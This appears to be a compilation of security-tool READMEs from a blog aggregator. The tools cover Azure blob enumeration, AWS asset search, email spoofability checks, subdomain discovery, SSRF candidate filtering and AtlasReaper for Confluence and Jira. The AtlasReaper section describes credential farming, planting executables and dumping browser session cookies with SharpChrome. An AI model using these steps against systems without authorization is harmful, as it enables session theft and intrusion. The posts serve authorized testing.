
Goblob - A Fast Enumeration Tool For Publicly Exposed Azure Storage Blobs

By: Zion3R


Goblob is a lightweight and fast enumeration tool designed to aid in the discovery of sensitive information exposed publicly in Azure blobs, which can be useful for various research purposes such as vulnerability assessments, penetration testing, and reconnaissance.

Warning: Goblob will issue an individual goroutine for each container name to check in each storage account, limited only by the maximum number of concurrent goroutines specified in the -goroutines flag. This implementation can exhaust bandwidth pretty quickly in most cases with the default wordlist, or potentially cost you a lot of money if you're using the tool in a cloud environment. Make sure you understand what you are doing before running the tool.


Installation

go install github.com/Macmod/goblob@latest

Usage

To use goblob simply run the following command:

$ ./goblob <storageaccountname>

Where <storageaccountname> is the target storage account to enumerate public Azure blob storage URLs on.

You can also specify a list of storage account names to check:

$ ./goblob -accounts accounts.txt

By default, the tool will use a list of common Azure Blob Storage container names to construct potential URLs. However, you can also specify a custom list of container names using the -containers option. For example:

$ ./goblob -accounts accounts.txt -containers wordlists/goblob-folder-names.txt

The tool also supports outputting the results to a file using the -output option:

$ ./goblob -accounts accounts.txt -containers wordlists/goblob-folder-names.txt -output results.txt

If you want to provide accounts to test via stdin you can also omit -accounts (or the account name) entirely:

$ cat accounts.txt | ./goblob

Wordlists

Goblob comes bundled with basic wordlists that can be used with the -containers option:

Optional Flags

Goblob provides several flags that can be tuned in order to improve the enumeration process:

  • -goroutines=N - Maximum number of concurrent goroutines to allow (default: 5000).
  • -blobs=true - Report the URL of each blob instead of the URL of the containers (default: false).
  • -verbose=N - Set verbosity level (default: 1, min: 0, max: 3).
  • -maxpages=N - Maximum number of container pages to traverse looking for blobs (default: 20; set to -1 to disable the limit, or to 0 to skip listing blobs entirely and just check whether the container is public)
  • -timeout=N - Timeout for HTTP requests (seconds, default: 90)
  • -maxidleconns=N - MaxIdleConns transport parameter for HTTP client (default: 100)
  • -maxidleconnsperhost=N - MaxIdleConnsPerHost transport parameter for HTTP client (default: 10)
  • -maxconnsperhost=N - MaxConnsPerHost transport parameter for HTTP client (default: 0)
  • -skipssl=true - Skip SSL verification (default: false)
  • -invertsearch=true - Enumerate accounts for each container instead of containers for each account (default: false)

For instance, if you just want to find publicly exposed containers using large lists of storage accounts and container names, you should use -maxpages=0 to prevent the goroutines from paginating the results. Then run it again on the set of results you found with -blobs=true and -maxpages=-1 to actually get the URLs of the blobs.
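As a rough sketch of that two-pass workflow (hits.txt is a hypothetical file extracted from the first pass's output; flag names are taken from the list above):

# Pass 1: only check container visibility; -maxpages=0 skips blob listing entirely
./goblob -accounts accounts.txt -containers wordlists/goblob-folder-names.txt -maxpages=0 -output public-containers.txt

# Pass 2: re-run against the hits and collect every blob URL, with no page limit
./goblob -accounts hits.txt -blobs=true -maxpages=-1 -output blob-urls.txt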

If, on the other hand, you want to test a small list of very popular container names against a large set of storage accounts, you might want to try -invertsearch=true with -maxpages=0, in order to see the public accounts for each container name instead of the container names for each storage account.

You may also want to try changing -goroutines, -timeout, -maxidleconns, -maxidleconnsperhost, -maxconnsperhost and -skipssl in order to make the best use of your bandwidth and find results faster.

Experiment with the flags to find what works best for you ;-)

Example


Contributing

Contributions are welcome by opening an issue or by submitting a pull request.

TODO

  • Check blob domain for NXDOMAIN before trying wordlist to save bandwidth (maybe; see the sketch after this list)
  • Improve default parameters for better performance
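For context, the NXDOMAIN pre-check in the first item could look something like this sketch (ACCOUNT is a placeholder; <account>.blob.core.windows.net is Azure's standard blob endpoint format):

# skip accounts whose blob endpoint does not even resolve, saving every wordlist request
ACCOUNT="examplestorageaccount"
if [ -z "$(dig +short "${ACCOUNT}.blob.core.windows.net")" ]; then
    echo "NXDOMAIN - skipping ${ACCOUNT}"
fi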

Wordcloud

An interesting visualization of popular container names found in my experiments with the tool:


If you want to know more about my experiments and the subject in general, take a look at my article:



CloudPulse - AWS Cloud Landscape Search Engine

By: Zion3R


During the reconnaissance phase, an attacker searches for any information about their target to create a profile that will later help them identify possible ways into an organization.
CloudPulse is a powerful tool that simplifies and enhances the analysis of SSL certificate data. It leverages the extensive repository of SSL certificates obtained from AWS EC2 machines, available at Trickest Cloud. With CloudPulse, security researchers can efficiently explore SSL certificate details, uncover potential vulnerabilities, and gather valuable insights for a variety of security-related tasks.


CloudPulse simplifies security assessments with a user-friendly interface. It allows you to effortlessly find a company's assets on the AWS cloud:

  • IPs
  • Subdomains
  • Domains associated with a target
  • Organization names
  • Origin IPs

To deploy with Docker:

1- Download CloudPulse:

git clone https://github.com/yousseflahouifi/CloudPulse
cd CloudPulse/

2- Run docker compose :

docker-compose up -d

3- Run the script.py script:

docker-compose exec web python script.py

4- Now go to http://<host>:8000/search and enjoy the search engine.

To deploy without Docker:

1- Download CloudPulse:

git clone https://github.com/yousseflahouifi/CloudPulse
cd CloudPulse/

2- Set up a virtual environment:

python3 -m venv myenv
source myenv/bin/activate

3- Install the requirements.txt file:

pip install -r requirements.txt

4- Run an instance of Elasticsearch using Docker:

docker run -d --name elasticsearch -p 9200:9200 -e "discovery.type=single-node" elasticsearch:6.6.1

5- Update script.py and the settings file to use the host 'localhost':

#script.py
es = Elasticsearch([{'host': 'localhost', 'port': 9200}])

#se/settings.py
ELASTICSEARCH_DSL = {
    'default': {
        'hosts': 'localhost:9200'
    },
}

6- Run script.py to index the data in Elasticsearch:

python script.py

7- Run the app:

python manage.py runserver 0:8000

Included in the CloudPulse repository is a sample data.csv file containing close to 4,000 records, which provides a glimpse of the tool's capabilities. For the full dataset, visit the Trickest Cloud repository, clone the data, and update the data.csv file (the full dataset contains close to 9 million records).
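A hedged sketch of swapping in the full dataset (the repository name and file layout are assumptions; check the Trickest Cloud repository for the actual paths):

# hypothetical: fetch the full Trickest dataset and replace the bundled sample
git clone https://github.com/trickest/cloud.git
cp cloud/<path-to-full-dataset>.csv data.csv   # actual path: see the Trickest repo
python script.py                               # re-index the new data in Elasticsearch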

As an example, searching for .mil data gives:

Searching for tesla, as another example, gives:

CloudPulse heavily depends on the data.csv file, which is a sample dataset extracted from the larger collection maintained by Trickest. While the sample dataset provides valuable insights, the tool's full potential is realized when used in conjunction with the complete dataset, which is accessible in the Trickest repository here.
Users are encouraged to refer to the Trickest dataset for a more comprehensive and up-to-date analysis.



Mailchecker - Cross-language Temporary (Disposable/Throwaway) Email Detection Library. Covers 55 734+ Fake Email Providers

By: Zion3R


Cross-language email validation. Backed by a database of over 55,000 throwaway email domains.

This is very helpful when you have to contact your users and want to avoid errors causing a lack of communication, or want to block "spamboxes".


Need to provide Webhooks inside your SaaS?

Need to embed a chart into an email?

It's over with Image-Charts, no more server-side rendering pain, 1 url = 1 chart.

https://image-charts.com/chart?
cht=lc // chart type
&chd=s:cEAELFJHHHKUju9uuXUc // chart data
&chxt=x,y // axis
&chxl=0:|0|1|2|3|4|5| // axis labels
&chs=873x200 // size

Use Image-Charts for free


Upgrade from 1.x to 3.x

MailChecker's public API has been normalized; here are the changes:

  • NodeJS/JavaScript: MailChecker(email) -> MailChecker.isValid(email)
  • PHP: MailChecker($email) -> MailChecker::isValid($email)
  • Python
import MailChecker
m = MailChecker.MailChecker()
if not m.is_valid('bla@example.com'):
    # ...

became:

import MailChecker
if not MailChecker.is_valid('bla@example.com'):
    # ...

MailChecker currently supports:


Usage

NodeJS

var MailChecker = require('mailchecker');

if(!MailChecker.isValid('myemail@yopmail.com')){
  console.error('O RLY !');
  process.exit(1);
}

if(!MailChecker.isValid('myemail.com')){
  console.error('O RLY !');
  process.exit(1);
}

JavaScript

<script type="text/javascript" src="MailChecker/platform/javascript/MailChecker.js"></script>
<script type="text/javascript">
  if(!MailChecker.isValid('myemail@yopmail.com')){
    console.error('O RLY !');
  }

  if(!MailChecker.isValid('myemail.com')){
    console.error('O RLY !');
  }
</script>

PHP

include __DIR__."/MailChecker/platform/php/MailChecker.php";

if(!MailChecker::isValid('myemail@yopmail.com')){
  die('O RLY !');
}

if(!MailChecker::isValid('myemail.com')){
  die('O RLY !');
}

Python

pip install mailchecker

from MailChecker import MailChecker

if not MailChecker.is_valid('bla@example.com'):
    print("O RLY !")

Django validator: https://github.com/jonashaag/django-indisposable

Ruby

require 'mail_checker'

unless MailChecker.valid?('myemail@yopmail.com')
  fail('O RLY!')
end

Rust

extern crate mailchecker;

assert_eq!(true, mailchecker::is_valid("plop@plop.com"));
assert_eq!(false, mailchecker::is_valid("\nok@gmail.com\n"));
assert_eq!(false, mailchecker::is_valid("ok@guerrillamailblock.com"));

Elixir

Code.require_file("mail_checker.ex", "mailchecker/platform/elixir/")

unless MailChecker.valid?("myemail@yopmail.com") do
  raise "O RLY !"
end

unless MailChecker.valid?("myemail.com") do
  raise "O RLY !"
end

Clojure

; no package yet; just drop in mailchecker.clj where you want to use it.
(load-file "platform/clojure/mailchecker.clj")

(if (not (mailchecker/valid? "myemail@yopmail.com"))
  (throw (Throwable. "O RLY!")))

(if (not (mailchecker/valid? "myemail.com"))
  (throw (Throwable. "O RLY!")))

Go

package main

import (
    "log"

    mail_checker "github.com/FGRibreau/mailchecker/platform/go"
)

func main() {
    if !mail_checker.IsValid("myemail@yopmail.com") {
        log.Fatal("O RLY !")
    }

    if !mail_checker.IsValid("myemail.com") {
        log.Fatal("O RLY !")
    }
}

Installation

Go

go get github.com/FGRibreau/mailchecker

NodeJS/JavaScript

npm install mailchecker

Ruby

gem install ruby-mailchecker

PHP

composer require fgribreau/mailchecker

We accept pull requests for other package managers.

Data sources

TorVPN

  $('td', 'table:last').map(function(){
    return this.innerText;
  }).toArray();

BloggingWV

  Array.prototype.slice.call(document.querySelectorAll('.entry > ul > li a')).map(function(el){return el.innerText});

... please add your own dataset to list.txt.

Regenerate libraries from list.txt

Just run (requires NodeJS):

npm run build

Development

Development environment requires docker.

# install and setup every language dependencies in parallel through docker
npm install

# run every language setup in parallel through docker
npm run setup

# run every language tests in parallel through docker
npm test

Backers

Maintainers

These amazing people are maintaining this project:

Contributors

These amazing people have contributed code to this project:

Discover how you can contribute by heading on over to the CONTRIBUTING.md file.

Changelog



PathFinder - Tool That Provides Information About A Website

By: Zion3R


Web Path Finder is a Python program that provides information about a website. It retrieves various details such as page title, last updated date, DNS information, subdomains, firewall names, technologies used, certificate information, and more.


  • Retrieve important information about a website
  • Gain insights into the technologies used by a website
  • Identify subdomains and DNS information
  • Check firewall names and certificate details
  • Perform bypass operations for captcha and JavaScript content

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/PathFinder.git
  2. Install the required packages:

    pip install -r requirements.txt

This will install all the required modules and their respective versions.

Run the program using the following command:

┌──(root💀denizhalil)-[~/MyProjects/]
└─# python3 pathFinder.py --help
usage: pathFinder.py [-h] url

Web Information Program

positional arguments:
  url         Enter the site URL

options:
  -h, --help  show this help message and exit

Replace <url> with the URL of the website you want to explore.

Here is an example output of running the program:

┌──(root💀denizhalil)-[~/MyProjects/]
└─# python3 pathFinder.py https://www.facebook.com/
Site Information:
  Title: Facebook - Login or Register
  Last Updated Date: None
  First Creation Date: 1997-03-29 05:00:00
  Dns Information: []
  Sub Branches: ['157']
  Firewall Names: []
  Technologies Used: javascript, php, css, html, react
Certificate Information:
  Certificate Issuer: US
  Certificate Start Date: 2023-02-07 00:00:00
  Certificate Expiration Date: 2023-05-08 23:59:59
  Certificate Validity Period (Days): 90
Bypassed JavaScript content:
  </div>

Contributions are welcome! To contribute to PathFinder, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

  • Thank you to my friend Varol

This project is licensed under the MIT License - see the LICENSE file for details.

For any inquiries or further information, you can reach me through the following channels:



Spoofy - Program That Checks If A List Of Domains Can Be Spoofed Based On SPF And DMARC Records

By: Zion3R



Spoofy is a program that checks if a list of domains can be spoofed based on SPF and DMARC records. You may be asking, "Why do we need another tool that can check if a domain can be spoofed?"

Well, Spoofy is different and here is why:

  1. Authoritative lookups on all lookups with known fallback (Cloudflare DNS)
  2. Accurate bulk lookups
  3. Custom, manually tested spoof logic (No guessing or speculating, real world test results)
  4. SPF lookup counter


HOW TO USE

Spoofy requires Python 3+. Python 2 is not supported. Usage is shown below:

Usage:
./spoofy.py -d [DOMAIN] -o [stdout or xls]
OR
./spoofy.py -iL [DOMAIN_LIST] -o [stdout or xls]

Install Dependencies:
pip3 install -r requirements.txt

HOW DO YOU KNOW IT'S SPOOFABLE

(The spoofability table lists every combination of SPF and DMARC configurations that impact deliverability to the inbox, except for DKIM modifiers.) Download Here

METHODOLOGY

The creation of the spoofability table involved listing every relevant SPF and DMARC configuration, combining them, and then conducting SPF and DMARC information collection using an early version of Spoofy on a large number of US government domains. Testing if an SPF and DMARC combination was spoofable or not was done using the email security pentesting suite at emailspooftest using Microsoft 365. However, the initial testing was conducted using Protonmail and Gmail, but these services were found to utilize reverse lookup checks that affected the results, particularly for subdomain spoof testing. As a result, Microsoft 365 was used for the testing, as it offered greater control over the handling of mail.

After the initial testing using Microsoft 365, some combinations were retested using Protonmail and Gmail due to the differences in their handling of banners in emails. Protonmail and Gmail can place spoofed mail in the inbox with a banner or in spam without a banner, leading to some SPF and DMARC combinations being reported as "Mailbox Dependent" when using Spoofy. In contrast, Microsoft 365 places both conditions in spam. The testing and data collection process took several days to complete, after which a good master table was compiled and used as the basis for the Spoofy spoofability logic.
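If you want to eyeball the underlying records yourself, independent of Spoofy's own logic, two plain dig queries show the SPF and DMARC values the spoofability table is keyed on:

# SPF is published as a TXT record on the domain itself
dig +short TXT example.com | grep 'v=spf1'

# DMARC is published as a TXT record on the _dmarc subdomain
dig +short TXT _dmarc.example.com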

DISCLAIMER

This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software.

CREDIT

Lead / Only programmer & spoofability logic comprehension upgrades & lookup resiliency system / fix (main issue with other tools) & multithreading & feature additions: Matt Keeley

DMARC, SPF, DNS insights & Spoofability table creation/confirmation/testing & application accuracy/quality assurance: calamity.email / eman-ekaf

Logo: cobracode

Tool was inspired by Bishop Fox's project called spoofcheck.



DakshSCRA - Source Code Review Assist

By: Zion3R


The Daksh SCRA (Source Code Review Assist) tool is built to enhance the efficiency of the source code review process, providing a well-structured and organized approach for code reviewers.

Rather than indiscriminately flagging everything as a potential issue, Daksh SCRA promotes thoughtful analysis, urging the investigation and confirmation of potential problems. This approach mitigates the scramble to tag every potential concern as a bug, cutting back on the confusion and wasted time spent on false positives.

What sets Daksh SCRA apart is its emphasis on avoiding unnecessary bug tagging. Unlike conventional methods, it advocates for thorough investigation and confirmation of potential issues before tagging them as bugs. This approach helps mitigate the issue of false positives, which often consume valuable time and resources, thereby fostering a more productive and efficient code review process.


Debut

Daksh SCRA was initially introduced during a source code review training session I conducted at Black Hat USA 2022 (August 6 - 9), where it was subtly presented to a specific audience. However, this introduction was carried out with a low-profile approach, avoiding any major announcements.

While this tool was quietly published on GitHub after the 2022 training, its official public debut took place at Black Hat USA 2023 in Las Vegas.

Features and Functionalities

Distinctive Features (Multiple World’s First)

  • Identifies Areas of Interest in Source Code: Encourage focused investigation and confirmation rather than indiscriminately labeling everything as a bug.

  • Identifies Areas of Interest in File Paths (World’s First): Recognises patterns in file paths to pinpoint relevant sections for review.

  • Software-Level Reconnaissance to Identify Technologies Utilised: Identifies project technologies, enabling code reviewers to conduct precise scans with appropriate rules.

  • Automated Scientific Effort Estimation for Code Review (World’s First): Provides a measurable approach for estimating the effort required for a code review process.

Although this tool has progressed beyond its early stages, it has reached a functional state that is quite usable and delivers on its promised capabilities. Nevertheless, active enhancements are currently underway, and there are multiple new features and improvements expected to be added in the upcoming months.

Additionally, the tool offers the following functionalities:

  • Options to use platform-specific rules for finding areas of interest
  • Options to extend or add new rules for any new or existing languages
  • Generates reports in text, HTML, and PDF formats for inspection

Refer to the wiki for the tool setup and usage details - https://github.com/coffeeandsecurity/DakshSCRA/wiki

Feel free to contribute towards updating or adding new rules and future development.

If you find any bugs, report them to d3basis.m0hanty@gmail.com.

Tool Setup

Pre-requisites

Python3 and all the libraries listed in requirements.txt

Setting up environment to run this tool

1. Setup a virtual environment

$ pip install virtualenv

$ virtualenv -p python3 {name-of-virtual-env} // Create a virtualenv
Example: virtualenv -p python3 venv

$ source {name-of-virtual-env}/bin/activate // To activate virtual environment you just created
Example: source venv/bin/activate

After running the activate command you should see the name of your virtual env at the beginning of your terminal like this: (venv) $

2. Ensure all required libraries are installed within the virtual environment

You must run the below command after activating the virtual environment as mentioned in the previous steps.

pip install -r requirements.txt

Once the above step successfully installs all the required libraries, refer to the following tool usage commands to run the tool.

Tool Usage

$ python3 dakshscra.py -h // To view available options and arguments

usage: dakshscra.py [-h] [-r RULE_FILE] [-f FILE_TYPES] [-v] [-t TARGET_DIR] [-l {R,RF}] [-recon] [-estimate]

options:
  -h, --help            show this help message and exit
  -r RULE_FILE          Specify platform specific rule name
  -f FILE_TYPES         Specify file types to scan
  -v                    Specify verbosity level {'-v', '-vv', '-vvv'}
  -t TARGET_DIR         Specify target directory path
  -l {R,RF}, --list {R,RF}
                        List rules [R] OR rules and filetypes [RF]
  -recon                Detects platform, framework and programming language used
  -estimate             Estimate efforts required for code review

Example Usage

$ python3 dakshscra.py // To view tool usage along with examples

Examples:
# '-f' is optional. If not specified, it will default to the corresponding filetypes of the selected rule.
dakshscra.py -r php -t /source_dir_path

# To override default settings, other filetypes can be specified with the '-f' option.
dakshscra.py -r php -f dotnet -t /path_to_source_dir
dakshscra.py -r php -f custom -t /path_to_source_dir

# Perform reconnaissance and rule-based scanning if '-recon' is used with the '-r' option.
dakshscra.py -recon -r php -t /path_to_source_dir

# Perform only reconnaissance if '-recon' is used without the '-r' option.
dakshscra.py -recon -t /path_to_source_dir

# Verbosity: '-v' is default; '-vvv' will display all rule checks within each rule category.
dakshscra.py -r php -vv -t /path_to_source_dir


Supported RULE_FILE: dotnet, java, php, javascript
Supported FILE_TYPES: dotnet, php, java, custom, allfiles

Reports

The tool generates reports in three formats: HTML, PDF, and TEXT. Although the HTML and PDF reports are still being improved, they are currently in a reasonably good state. With each subsequent iteration, these reports will continue to be refined and improved even further.

Scanning (Areas of Security Concerns) Report

HTML Report:
  • DakshSCRA/reports/html/report.html
PDF Report:
  • DakshSCRA/reports/html/report.pdf
RAW TEXT Based Reports:
  • Areas of Interest - Identified Patterns: DakshSCRA/reports/text/areas_of_interest.txt
  • Areas of Interest - Project Files: DakshSCRA/reports/text/filepaths_aoi.txt
  • Identified Project Files: DakshSCRA/runtime/filepaths.txt

Reconnaissance (Recon) Report

  • Reconnaissance Summary: /reports/text/recon.txt

Note: Currently, the reconnaissance report is created in a text format. However, in upcoming releases, the plan is to incorporate it into the vulnerability scanning report, which will be available in both HTML and PDF formats.

Code Review Effort Estimation Report

  • Effort estimation report: /reports/html/estimation.html

Note: At present, the effort estimation for the source code review is in its early stages. It is considered experimental and will be developed and refined through several iterations. Improvements will be made over multiple releases, as the formula and the concept are new and require time to be honed to achieve accuracy or reasonable estimation.

Currently, the report is generated in HTML format. However, in future releases, there are plans to also provide it in PDF format.



Nodesub - Command-Line Tool For Finding Subdomains In Bug Bounty Programs

By: Zion3R


Nodesub is a command-line tool for finding subdomains in bug bounty programs. It supports various subdomain enumeration techniques and provides flexible options for customization.


Features

  • Perform subdomain enumeration using CIDR notation (Support input list).
  • Perform subdomain enumeration using ASN (Support input list).
  • Perform subdomain enumeration using a list of domains.

Installation

To install Nodesub, use the following command:

npm install -g nodesub

NOTE:

  • Edit the file ~/.config/nodesub/config.ini

Usage

nodesub -h

This will display help for the tool. Here are all the switches it supports.

Examples
  • Enumerate subdomains for a single domain:

     nodesub -u example.com
  • Enumerate subdomains for a list of domains from a file:

     nodesub -l domains.txt
  • Perform subdomain enumeration using CIDR:

    node nodesub.js -c 192.168.0.0/24 -o subdomains.txt

    node nodesub.js -c CIDR.txt -o subdomains.txt

  • Perform subdomain enumeration using ASN:

    node nodesub.js -a AS12345 -o subdomains.txt
    node nodesub.js -a ASN.txt -o subdomains.txt
  • Enable recursive subdomain enumeration and output the results to a JSON file:

     nodesub -u example.com -r -o output.json -f json

Output

The tool provides various output formats for the results, including:

  • Text (txt)
  • JSON (json)
  • CSV (csv)
  • PDF (pdf)

The output file contains the resolved subdomains, failed resolved subdomains, or all subdomains based on the options chosen.
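As a sketch, the JSON output can be post-processed with jq; the flat-array filter below is an assumption about the output schema, so adjust it to the actual structure:

# hypothetical post-processing of JSON results
nodesub -u example.com -r -o output.json -f json
jq -r '.[]' output.json | sort -u   # assumes a flat array of subdomain strings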



AtlasReaper - A Command-Line Tool For Reconnaissance And Targeted Write Operations On Confluence And Jira Instances

By: Zion3R



AtlasReaper is a command-line tool developed for offensive security purposes, primarily focused on reconnaissance of Confluence and Jira. It also provides various features that can be helpful for tasks such as credential farming and social engineering. The tool is written in C#.


Blog post: Sowing Chaos and Reaping Rewards in Confluence and Jira

                                                   .@@@@
@@@@@
@@@@@ @@@@@@@
@@@@@ @@@@@@@@@@@
@@@@@ @@@@@@@@@@@@@@@
@@@@, @@@@ *@@@@
@@@@ @@@ @@ @@@ .@@@
_ _ _ ___ @@@@@@@ @@@@@@
/_\| |_| |__ _ __| _ \___ __ _ _ __ ___ _ _ @@ @@@@@@@@
/ _ \ _| / _` (_-< / -_) _` | '_ \/ -_) '_| @@ @@@@@@@@
/_/ \_\__|_\__,_/__/_|_\___\__,_| .__/\___|_| @@@@@@@@ &@
|_| @@@@@@@@@@ @@&
@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@. @@
@werdhaihai

Usage

AtlasReaper uses commands, subcommands, and options. The format for executing commands is as follows:

.\AtlasReaper.exe [command] [subcommand] [options]

Replace [command], [subcommand], and [options] with the appropriate values based on the action you want to perform. For more information about each command or subcommand, use the -h or --help option.

Below is a list of available commands and subcommands:

Commands

Each command has subcommands for interacting with the specific product.

  • confluence
  • jira

Subcommands

Confluence

  • confluence attach - Attach a file to a page.
  • confluence download - Download an attachment.
  • confluence embed - Embed a 1x1 pixel image to perform farming attacks.
  • confluence link - Add a link to a page.
  • confluence listattachments - List attachments.
  • confluence listpages - List pages in Confluence.
  • confluence listspaces - List spaces in Confluence.
  • confluence search - Search Confluence.

Jira

  • jira addcomment - Add a comment to an issue.
  • jira attach - Attach a file to an issue.
  • jira createissue - Create a new issue.
  • jira download - Download attachment(s) from an issue.
  • jira listattachments - List attachments on an issue.
  • jira listissues - List issues in Jira.
  • jira listprojects - List projects in Jira.
  • jira listusers - List Atlassian users.
  • jira searchissues - Search issues in Jira.

Common Commands

  • help - Display more information on a specific command.

Examples

Here are a few examples of how to use AtlasReaper:

  • Search for a keyword in Confluence with wildcard search:

    .\AtlasReaper.exe confluence search --query "http*example.com*" --url $url --cookie $cookie

  • Attach a file to a page in Confluence:

    .\AtlasReaper.exe confluence attach --page-id "12345" --file "C:\path\to\file.exe" --url $url --cookie $cookie

  • Create a new issue in Jira:

    .\AtlasReaper.exe jira createissue --project "PROJ" --issue-type Task --message "I can't access this link from my host" --url $url --cookie $cookie

Authentication

Confluence and Jira can be configured to allow anonymous access. You can check this by omitting the -c/--cookie option from the commands (see the sketch after the steps below).

In the event authentication is required, you can dump cookies from a user's browser with SharpChrome or another similar tool.

  1. .\SharpChrome.exe cookies /showall

  2. Look for any cookies scoped to *.atlassian.net named cloud.session.token or tenant.session.token
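For example, a hedged anonymous-access check might look like this (listspaces and --url come from the command list above; the target URL is a placeholder):

# if this returns data without a cookie, anonymous access is enabled
.\AtlasReaper.exe confluence listspaces --url https://<target>.atlassian.net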

Limitations

Please note the following limitations of AtlasReaper:

  • The tool has not been thoroughly tested in all environments, so it's possible to encounter crashes or unexpected behavior. Efforts have been made to minimize these issues, but caution is advised.
  • AtlasReaper uses the cloud.session.token or tenant.session.token which can be obtained from a user's browser. Alternatively, it can use anonymous access if permitted. (API tokens or other auth is not currently supported)
  • For write operations, the username associated with the user session token (or "anonymous") will be listed.

Contributing

If you encounter any issues or have suggestions for improvements, please feel free to contribute by submitting a pull request or opening an issue in the AtlasReaper repo.



Surf - Escalate Your SSRF Vulnerabilities On Modern Cloud Environments

By: Zion3R


surf allows you to filter a list of hosts, returning a list of viable SSRF candidates. It does this by sending an HTTP request from your machine to each host, collecting all the hosts that did not respond, and then filtering them into a list of externally facing and internally facing hosts.

You can then attempt these hosts wherever an SSRF vulnerability may be present. Because most SSRF filters focus only on internal or restricted IP ranges, you'll be pleasantly surprised when you get SSRF on an external IP that is not accessible via HTTP(S) from your machine.

Often you will find that large companies with cloud environments will have external IPs for internal web apps. Traditional SSRF filters will not capture this unless these hosts are specifically added to a blacklist (which they usually never are). This is why this technique can be so powerful.
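Once you have a candidate list, a rough way to exercise it against a suspected SSRF parameter is a loop like the sketch below (the vulnerable endpoint and parameter are placeholders; the external-{timestamp}.txt file is described under Output further down):

# hypothetical: replay each candidate host through a suspected SSRF parameter
while read -r host; do
    code=$(curl -s -o /dev/null -w '%{http_code}' --max-time 5 "https://vulnerable.example/fetch?url=http://${host}/")
    echo "${host} => ${code}"
done < external-<timestamp>.txt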


Installation

This tool requires go 1.19 or above as we rely on httpx to do the HTTP probing.

It can be installed with the following command:

go install github.com/assetnote/surf/cmd/surf@latest

Usage

Consider that you have subdomains for bigcorp.com inside a file named bigcorp.txt, and you want to find all the SSRF candidates for these subdomains. Here are some examples:

# find all ssrf candidates (including external IP addresses via HTTP probing)
surf -l bigcorp.txt
# find all ssrf candidates (including external IP addresses via HTTP probing) with timeout and concurrency settings
surf -l bigcorp.txt -t 10 -c 200
# find all ssrf candidates (including external IP addresses via HTTP probing), and just print all hosts
surf -l bigcorp.txt -d
# find all hosts that point to an internal/private IP address (no HTTP probing)
surf -l bigcorp.txt -x

The full list of settings can be found below:

❯ surf -h

β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β•
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•” β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘
β•šβ•β•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β•β•šβ•β•

by shubs @ assetnote

Usage: surf [--hosts FILE] [--concurrency CONCURRENCY] [--timeout SECONDS] [--retries RETRIES] [--disablehttpx] [--disableanalysis]

Options:
  --hosts FILE, -l FILE
                        List of assets (hosts or subdomains)
  --concurrency CONCURRENCY, -c CONCURRENCY
                        Threads (passed down to httpx) [default: 100]
  --timeout SECONDS, -t SECONDS
                        Timeout in seconds (passed down to httpx) [default: 3]
  --retries RETRIES, -r RETRIES
                        Retries on failure (passed down to httpx) [default: 2]
  --disablehttpx, -x    Disable httpx and only output list of hosts that resolve to an internal IP address [default: false]
  --disableanalysis, -d
                        Disable analysis and only output list of hosts [default: false]
  --help, -h            display this help and exit

Output

When running surf, it will print the SSRF candidates to stdout, but it will also save two files inside the folder it is run from:

  • external-{timestamp}.txt - Externally resolving, but unable to send HTTP requests to from your machine
  • internal-{timestamp}.txt - Internally resolving, and obviously unable to send HTTP requests from your machine

These two files will contain the list of hosts that are ideal SSRF candidates to try on your target. The external target list has higher chances of being viable than the internal list.

Acknowledgements

Under the hood, this tool leverages httpx to do the HTTP probing. It captures errors returned from httpx, and then performs some basic analysis to determine the most viable candidates for SSRF.

This tool was created as a result of a live hacking event for HackerOne (H1-4420 2023).



Xsubfind3R - A CLI Utility To Find A Domain's Known Subdomains From Curated Passive Online Sources

By: Zion3R


xsubfind3r is a command-line interface (CLI) utility to find a domain's known subdomains from curated passive online sources.


Features

  • Fetches domains from curated passive sources to maximize results.

  • Supports stdin and stdout for easy integration into workflows.

  • Cross-Platform (Windows, Linux & macOS).

Installation

Install release binaries (Without Go Installed)

Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

  • ...with wget:

     wget https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz
  • ...or, with curl:

     curl -OL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz

...then, extract the binary:

tar xf xsubfind3r-<version>-linux-amd64.tar.gz

TIP: The two steps above, download and extract, can be combined into a single step with this one-liner:

curl -sL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz | tar -xzv

NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xsubfind3r executable.

...move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

sudo mv xsubfind3r /usr/local/bin/

